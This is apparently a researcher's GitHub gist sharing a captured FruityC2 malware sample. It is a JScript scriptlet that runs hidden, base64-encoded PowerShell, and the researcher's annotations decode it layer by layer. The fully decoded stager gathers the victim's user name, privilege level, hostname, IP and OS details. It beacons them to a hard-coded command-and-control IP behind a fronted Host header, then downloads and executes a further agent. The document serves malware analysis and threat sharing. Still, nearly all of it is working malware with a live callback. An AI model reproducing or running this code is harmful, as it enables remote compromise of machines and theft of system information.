Skip to content

Instantly share code, notes, and snippets.

@JohnLaTwC

JohnLaTwC/606b4bd217b980ce70e4986511fcd00f43e7a89e9e2c6a51ea90d6f3faf33ac9.sct

Created March 24, 2018 16:39
Show Gist options
  • Save JohnLaTwC/1ad483a1eecd7dde79f82cd538bc30ef to your computer and use it in GitHub Desktop.
Save JohnLaTwC/1ad483a1eecd7dde79f82cd538bc30ef to your computer and use it in GitHub Desktop.
Download ZIP
FruityC2 Scriptlet 606b4bd217b980ce70e4986511fcd00f43e7a89e9e2c6a51ea90d6f3faf33ac9
Raw
606b4bd217b980ce70e4986511fcd00f43e7a89e9e2c6a51ea90d6f3faf33ac9.sct
## uploaded by @JohnLaTwC
## Sample hash: 606b4bd217b980ce70e4986511fcd00f43e7a89e9e2c6a51ea90d6f3faf33ac9
<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - Casey Smith @subTee -->
<!-- License: BSD3-Clause -->
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("powershell.exe -nop -w hidden -e JABkAGEAdABhACAAPQAgACIAdABWAGgAdABUADkAcwA2AEYAUAA0ADgAZgBvAFcAVgBaAFMATABaAG0AdABBAEMAWQAxAHMAUgBIADcAbwBTAFIAaQBXAGcAcQBDAG4AagBTAGwAVgBWAG0AYwBTAGwASABtAG4AYwBPAFMANgBGADAAZgA3ADMAZQAyAHoAbgByAFMAbQB3ADMAWAB0ADEASwA0ADIAMQBQAGoANAB2AGYAcwA2AHIAUABaADcASABnAGEAQQBzAFIAcAAzADQAbgB0ADAAUgB4AHgAZgA0AGwAbgBEADAAdABJAFgAZwBNADgATQBjAFQANQBHAGwAdgBzAHUAUAB5AFUAYwBKADQAZgBkAEEAUAAwAEsARwBVAFMAdQB2AHoAeABnAFgAbQA2AHQASgBFAGwAVQBYAHIAMQBwAHkANQBZAFQAUABxAFgAaABzADcANQBZAHAAZgB1AGQAWQBrAG4AegBQADkAegB2AGQAaQA4ADUAeABtAFQAYQA3AEgAVQAwAEkARABsAFAATgBhAHQAMQBXAGYAdwBmACsAWQB5AEwASQAxAEwAMABnAHcAdgBYAEIATgBoAHEAUQBTADAAWgBqAGMAWQA1AGoAZQBaAEIAaABzACsAawByAGkAOQB1AEUAQwB6AHEAbQBBAFIAYgBrAE8ANAA1AG8AaQBPAFcAaAAyAHoAaQBLAGIAbgBCAHcAQgAwAEsAZgBUAE0ASABuAFoASABYADQAeAAwAEsARABPAFkAYwBUAFgASABJAG0AVwBNAEQAawBLAGQAZQBaADEAcwBuADkAeAB4AGsAQgByAG4ANgBVAHAAQQBwAHUARwBJAHUARwBKAGgAdgBkADQASQBRAGMANwBBAE8AMwBPAGMAWgBSAFEAdABhAEoASgBBADcANAA0ADAAeAA1ADUALwBrAE4AQQBaAHYATwBPAEUAbQBTAGQASQBjADgAdwBaAFkARwArAFUAcABoAE8AUQBDAGIAaAA0AE8AUQB6AFcAOABpAHEAZgA0AFMAOAA0AFIAWQAxAGoAYwBpAG4ARwBQAEEAQQBUAGwAWABKADQAeABQAHMAVQBEAHYARQBsAHUAagBhAFMAYgBBAFoAVwBVAG4AeQBVADcAaABYAG4ASQBhAEIAMwBTAEcASQAvAGUAYQB4AGkARgBiAEoASgAyAFEAeABBAEkAbwBJAEIAUwBrAHQAZQBlAGMAdwAyAC8ATABkAGkALwB3AGwATgBoAG8AaQBiAHAAegBBAFoARQBFAFgATABlAHAAUABiADcAWABrAHgAWQBtAGIAcAAvAFQAcQBhAFcAVgAwAGIARgBsAEQAYgB6ADQAbgBuAEkAVwBUADQARQBmAGgARgAxAEIAZQBDAGsAWgBiAHAAKwBkAHMAUQBYAGgAbABvADAAYwA4AGgATQBaAGkAYgBMAEkAcwBKAC8ATQA1AEcAaAA3AGYAMwB1AGwAQgBCAEEAQQBSAEEAbAA1ADIAZABCADgAWQBZAGcARwAvAC8AZwA0AHQAdAB0AEoATwBuAEcAUABSAGUAUQAxAEYAVgAvAG4ATgBCAEoANgAyAHgAQQBaAHIAWABCAEsAWQA1AG8ASQBqAGcAWABqAGgAcgBaAGUATwBVAGEAYgB2AHIAZQA5AFEAbQAvAFIAMwB0AEUAcAB2AFoAMwBrAFoAMABDAEsAdABKAHUAZQB5AGoAeAByAGYAZgBYAE8ARgBGAG8AbABuADAAaQBuAFgAVQA5AHAAOQArAFkASABDAFEAUQBDADEAWAB1ADcAbwArADYATQBnAEIAbwBBAFcAZgB2AEwAZAB0AHUAKwBCAE8AOABaAC8AQwA5AGEANQA5ADQARwAvAGwAcAB3AG4AeQBUAEMAYQBiAE0ANABKAHIAbwBPAG0AQwBTACsAYgA3AGEANwA1ADUAZABYAGYAYQArAG4AKwBKAHkAQQB6AFcATwBCAEcAaQBBADMASQBaAEYAVQAzADUAbgBkADcANwBmAEMAVQBJAGEAZQA5AFAAWgBKAEgAegBtAG4ATgBDAFIAOQBEAEgARgAyAHEAdABJADAAZwBlAFUATgBLAHoAcQBYAEwAOQBqAHcAUgA0AGUAVABSADMATwBUAFcAVQBTAEYAdABiADMAYwB0AGcAZgAxADQAVABNAEgALwBlADcAMQBaAFAASAA0AEwAMwBxADYAZgBvAHMASABFAHkAcABnAHkANQB3AFQAOQBJAHkAUwBaAEYATgA4ADEAeAArADEAZQB1ADMAVAB3AG0AdgBqAHIASwA2AG0AMgBZAGIAVABrAHAAcQBYAFYAYwB1AGMAWQBUAEYAUgBEAEEARwBuAE0AOQBHAFUAUAAwAGUAMwBSAE4AagA1AFAAcwBFAGYAQwB5AGEAbABaAGgARQBBAFEAMAB3AFcARAB0AE4ASAAwAEcAbgBoAHgAbABCAHkAcgBzAGwATgBPADYASQBRAHQAMQBVAE8AaQBGAGoAMgA4AEYAZwBwAFUATABDADcAUgAzADcATwB3AGYAYwA2ADUAagBVAEoAVgB0AFYAbQB5AHoANQA4AFgAbwByAGIANQBrAFQAbABDAHQAUwBpAGkAcwBTAEMAMABzAGIAQgBSAEoAYQBiAFkAegBMAEcAOAAwAGkAVQBXAEQAYQBsAHAAdABIAGkAUQBqAFIAWgBoAHMAeAArAHAAMwBVAEwAbQA0ADAAYQA5AEEAbgA3ADkAZAAxAHQAeAB1ADQAbwBNAFcAcgBJAGsASgAzAGoAeQBPAHkAMwBlAHQAKwA4AC8AcQBHAHgAegBrAGIASAB5AEMAcAAxAEQAeQBjAG0AMABEADkAcwBjAE0AWQBiACsASgBnAFQANQBjAHEAYwBuAEkAYQBYAHMAUQBRAGgAawBqADUAbQBuAE0AQgBoAFEATQBJAEUAVQBVAGkATgBTAFoASgB4AHYAagBHAHAANQBKAHgAawBIAEMAagBsAGUASwBQADAAWABmAHIAZgB3AFUAegB3AHYAcwBvAEkATgAvAC8AcABuAHUATQBmAGoASwB1AGEAcwBJAHUAYwBWAGgAdwBpAGsAOABvADQAZABqAHcAbwBjAGEAYwBzAEUAUQBiAEsARgBhAHoAUwAwAHEAQgAvAHYAYQBrAGUAWAB6AEgAVwBKAEgAOQBqAG0ASwBwAGUAYgBlAFYALwBWACsAdgBRAGMAZQAxAHEAMgBUAHMAbgBRAHMAeABNAFMANwBkAG0AdQA3AG0AegBvADcAKwByAEYAbQBrADMAMQBRAC8AWgB5AFcAMQBUAGgANgBkAHQAcgBBAHMASwBaAFMAQQBmAEsAVgA4AGMAcwAwAFUAYwBNAFIAegBxAHgATABBAHkASABlAHYAbwBjAHcASQA1AEYARwB1ACsAbgBGAEEAWQBCADkAMABZADAAQgAyAGsAQQBlAGsAOQBCAEUAUgAxAHUAeQBGAGEARAAvAHQAcgBLAEwAegBFAGsAZgBnAGcASQAwADgAbgByADkAZgByADkAbAB5AGoASQBuAFcAMQBuAG4AdwBoAEcAVQBmAFEANgBTAHgAbABnAEYAMABTAHEAMwBOADQAegBTAHgAegBLAHQAYwB1AEkATABuAFMAKwBwAEEARwBkADYAZgByAG4AcABNAHAANAA0ADkAdwBVAG8ASwBuAHgAZgA3AGcAeABmADMAdABvAGkAKwA3AHgAOQBvAEUAegBXAHkAQgBrAGwAcQBlAE4AcABXAGQAcABlAC8AbgBMAEoAUQBaAGwASwAzAFkASgBiAHMAWABMAHkAbgBWAEcAaABSAFcAMwBBAEwAagAxAHAAaABjAHQAVwA2AFoAbABkAFYAMgB4AEcAQQBpAEsARwBXADcAVwBVADUAcgA2AEEAbwBRAEYAcgBKAEMAOQBOAGwAWABOAGEAaABrAHoAcAA1AEMAOQBXAE0AdAB6AGoARwBVAEMAcgBzAEMAYQB1AEoAeQBNAG8AdAB3AFEAQwB6AGoAZwAxAEUAegBIAE0AaQAyAHQAKwBoAHIAeQAvAGQAZwB6AHIAbgBxAG4AZgBtAHQARQArADkAbABqAGgAMwBnAEcATAAzAEcAawBVAFYAVQA4AHAAeQA3AGEAZgB5AFMAdQA3AFAAQQBsAGYAOABYADIAaAB6AFEAOQB1AEYAVgArADUANwBuAEcAdwBIAGYAegBwAC8AdwBiAFMASgA1AHcAdABsADAASABVAHQAbAA2ADcAKwBQAFEAbgBCAEYANgBsAHMAcABxAEkAYgBxAHQAZABUAGEATQB4AEwAZgBRAGcAYQB2ADcAZgBRAEoAdQBiAFAAcQB0AFgAbwAyAG8AMQAzAE0AbwA2AGoAawBEAFAANQA2AGIAUABWAFUALwBiAEgAKwAxADUAQQAvAEoAdABsAFEAVwB3AHEAcwAzAE8AbgBjAGwAVABiADAAbQBSAGUASABhAGUAZgBWAEUAWABDAFMAUgBRAEIALwBHAE0AbgBEAGIAMABhAEEAcQBzAHYAcgBFADMATQB4AG0AcQBHAG4AMwBHAE8AVgBFAEYAcABWAEIAWgBSAG0AOABtAGYANQBRADYATABvAG0ALwB3AGIAcABiAEIAaQB1AGYAaQBOADUAYgA5AFQAbgBOAEoAZgBOAFAAeQAzAEoANgAvAFUAeQB0ADkAYQBuAG0AZABkAG8AcQA2AE0AVgB0AHEAQQAxADkASgBPAHoAVABTAGEARABoAHEAYwBIADMAQwBKAFEAcABaADEAOABOAEYAMQB2ADAAQQBNAGYAawBEAFcAbAAwACsAdQAyADkAagBkAGwAZgBFAG8ASwAzAHMAUAB3ADAAZwA5AFIAVABDAFAAeQBvAGwAegByAHcANwBMADcAOQBEAFQASQBKAGgAZwBQAGoAUgBIAEsAMwBzAGoAdwBmAEoAMgA0AEsAaABwAHkAdABnAHAAcQB5AHkAYQBRADcAbQBEACsAUAAzAFcATgA2AC8AWAAxAEMASwBLAEwAUQBPAGQAagA4AE4ATQBjAGkAVwBTAGkAbgAyAHEANwBBADIARwBRAHgAUABpAGUAWgBiAFgAaAB0AEwAawBVAE8AUwBUAG8ARABDAE4AUQB4AFUASQBTAG8AVwAwAEUANAB1ADkAWABVAHMAeAB5AHcANwBlAHEASgBjAFkAZgBsAEEAaABGAEYASQB2AGMAagBRAHEASABPAG8AMgByAFUAbQA3AHcAdwByAHUATQBFAHYAbQB4AEwAMABxAGMAYwBhAFMAZwByAHAAZgBwAGcASgBoAFIATQBPAGMAOQByAEYARQBTADMAVAA4AGwATQBrAEgASgBUAEsAVwBvADEAdQBwADYAdgBYAEoAZwAzAEMAOQBPAEcAQwBoAEIATABiAFoAYgBQAG4AdABUAHMAZQBWADAANgBZAHUAZgBYADkAUwBIAFoAVwBTAFQAOABOAFMATQBTAGoANQBVAG0AdgBNAEsAUgAzAHYATAB3AFMARABpADEAbwBzADkAcQBjAFAARwA5AG0ATABnADQANABVAEIAVQA0AEIAawAxAE4AZwBVAG8ATABIAFMAZgAyAFIAKwBjAFgAUgBEAGsAMwA5ADYAZwBEADIARQBuADgAbgBqAFcAOQA5AFEAVQBkAE8ALwBrAFoAUwB2AEoAWQA0ADYAZgB0AEkAOQBrADcAaQBDAE0AeQBWAEEAVABwAGwAUQBIADAASwBlAG8ANgArAFUANABLADYARABMAHUAagAzADEAVABTAHAAeABXAG4ARwBHAHkATABJAGIAYQBVAG8AcABuADgAbwA3AHkANgBHAE8AcABwAFkASgBuAGQAawA1AGIAcQBaAHIANwBVAFYAOAA2AGwAdQBpAFkAdQA0AFoAcQAyAHoATwA0AHoAeQAxAGcAKwBFAEUAUgBwAFUARgBjAFMAZgBXAHUAMQBGAFUAUQBFADgANgAzADEAcAA2AE0AQwBBAEsAUAB4ADgAWQB2ADcAKwBZAHYAYgBxAEIALwBJAGYAMABhAE8AZwAvAEcANQAvAHIAbAB1AEsAQQBTAE4AYwAvAGEATABSAGgASABlACsAZQBqAFcAawBaAFYAZQBxAGQARgBGAEgAdwBIAEwASQBiAHIAdQBYAGgALwBzAEgAeQBLADQAYQBjAGsAcgB4AE0ANABuAHQAMwA2AEkAKwBIADIAegAwAFgAQwBoAGYARQBUADAAagBrAEEAQgBDAE8ANgBZAGsAZQBGAGkASgBFAFkAWgBGAEsATQBWAHkASgBFAFMAdgBkADkANQB2ADEAUQBCAHMAMQBnAHMAWABEAHoARgB2ADYARAAxAFEARAAwADAALwBnAFkAPQAiADsAJABkAGEAdABhACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGQAYQB0AGEAKQA7ACQAbQBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABtAHMALgBXAHIAaQB0AGUAKAAkAGQAYQB0AGEALAAgADAALAAgACQAZABhAHQAYQAuAEwAZQBuAGcAdABoACkAOwAkAG0AcwAuAFMAZQBlAGsAKAAwACwAMAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7ACQAcwByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoACQAbQBzACwAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAOwBJAEUAWAAgACQAcwByAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsA");
]]>
</script>
</registration>
</scriptlet>
## decodes to:
var r = new ActiveXObject("WScript.Shell").Run("powershell.exe -nop -w hidden -e $data = "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";$data = [System.Convert]::FromBase64String($data);$ms = New-Object System.IO.MemoryStream;$ms.Write($data, 0, $data.Length);$ms.Seek(0,0) | Out-Null;$sr = New-Object System.IO.StreamReader(New-Object System.IO.Compression.DeflateStream($ms, [System.IO.Compression.CompressionMode]::Decompress));IEX $sr.ReadToEnd();");
## decodes to:
var r = new ActiveXObject("WScript.Shell").Run("powershell.exe -nop -w hidden -e $data = "function Invoke-Stager {
param (
$r_server = "",
$r_port = "",
$r_ssl = "",
$UA = "FruityC2",
$SID = "SESSIONID",
$pg_header = ""
)
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls;
[bool]$o_base64 = $false
[bool]$o_encryption = $false
[bool]$o_compression = $true
$UUID = [int][double]::Parse((Get-Date -UFormat %s))
$s = ([System.Security.Principal.WindowsIdentity]::GetCurrent().Name) | Out-String
$USER = $s.Trim()
if(([Environment]::UserName).ToLower() -eq "system"){$s='4'}
elseif(([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator") -eq $true){$s='3'} # 3=High
else {$s='2'}
$LABEL = $s
$s = (Get-WmiObject Win32_OperatingSystem).CSName | Out-String
$NAME = $s.Trim()
$s = (Test-Connection $env:COMPUTERNAME -count 1 | select Ipv4Address) | FT -HideTableHeaders | Out-String
$IP = $s.Trim()
$s = (Get-WmiObject Win32_OperatingSystem).Name.split('|')[0] | Out-String
$VERSION = $s.Trim()
$s = (Get-WmiObject Win32_OperatingSystem).OSArchitecture | Out-String
$s = $s.Trim()
$OS_ARCH = $s
function Get-Data {
param($path = $script:path_get)
try{
$wc = new-object system.net.WebClient
$wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
$wc.Headers.Add("User-Agent",$UA)
$wc.Headers.Add("Cookie", "$SID=$TARGET;")
if ($pg_header -ne "") {
$hs = $pg_header.split("|")
foreach ($h in $hs) {
$i = $h.split(" ")
if ($PSVersionTable.PSVersion.Major -eq 2 -And $i[0] -Eq "Host" ) {
} else {
$wc.Headers.Add($i[0], $i[1])
}
}
}
$request = "http$($r_ssl)://$($r_server):$($r_port)$($path)"
$data = $wc.DownloadString($request)
return $data
}
catch [Net.WebException] {
Write-Host "Get-Data ERROR."
}
}
function deflate($data) {
$s = $data
$ms = New-Object System.IO.MemoryStream
$cs = New-Object System.IO.Compression.DeflateStream($ms, [System.IO.Compression.CompressionMode]::Compress)
$sw = New-Object System.IO.StreamWriter($cs)
$sw.Write($s)
$sw.Close();
$s = [System.Convert]::ToBase64String($ms.ToArray())
$s = $s.replace("+","-") # BASE64 URLSAFE
$s = $s.replace("/","_") # BASE64 URLSAFE
return $s
}
function inflate($data) {
$data = $data.replace("-","+") # BASE64 URLSAFE
$data = $data.replace("_","/") # BASE64 URLSAFE
$data = [System.Convert]::FromBase64String($data)
$ms = New-Object System.IO.MemoryStream
$ms.Write($data, 0, $data.Length)
$ms.Seek(0,0) | Out-Null
$sr = New-Object System.IO.StreamReader(New-Object System.IO.Compression.DeflateStream($ms, [System.IO.Compression.CompressionMode]::Decompress))
return $sr.ReadToEnd()
}
Function rx_data($data) {
if ($o_compression -eq $true) { $data = inflate($data) }
if ($o_encryption -eq $true) { $data = decrypt($data) }
return $data
}
Function tx_data($data) {
if ($o_encryption -eq $true) { $data = encrypt($data) }
if ($o_compression -eq $true) { $data = deflate($data) }
return $data
}
function stager($TARGET) {
$path_stager = -join ((65..90) + (97..122) | Get-Random -Count 30 | % {[char]$_})
$data = Get-Data -path "/$path_stager"
Write-Host "STAGER: $data"
[String]$data = rx_data($data)
[Array[]]$temp = $data.split("|")
$stime = [convert]::ToInt32($temp[0],10)
$jitter = [convert]::ToInt32($temp[1],10)
$UA = $temp[2]
$path_get = $temp[3]
$path_post = $temp[4]
$post_id = $temp[5]
$session_id = $temp[6]
$agent = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($temp[7]))
Write-Host $agent
IEX $($agent)
Invoke-FruityC2 -path_get $path_get -path_post $path_post -jitter $jitter -stime $stime -UA $UA -stager $false -r_server $r_server -r_port $r_port -target $TARGET -post_id $post_id -session_id $session_id -r_ssl $r_ssl -pg_header $pg_header
}
$TARGET = tx_data("$UUID|$VERSION|$USER|$LABEL|$NAME|$IP|$OS_ARCH|normal")
stager($TARGET)
}
clear
Invoke-Stager -r_server "159.89.106.106" -r_port "8080" -UA "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" -r_ssl "s" -pg_header "Accept */*|Host www.amazon.com"";$data = [System.Convert]::FromBase64String($data);$ms = New-Object System.IO.MemoryStream;$ms.Write($data, 0, $data.Length);$ms.Seek(0,0) | Out-Null;$sr = New-Object System.IO.StreamReader(New-Object System.IO.Compression.DeflateStream($ms, [System.IO.Compression.CompressionMode]::Decompress));IEX $sr.ReadToEnd();");
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment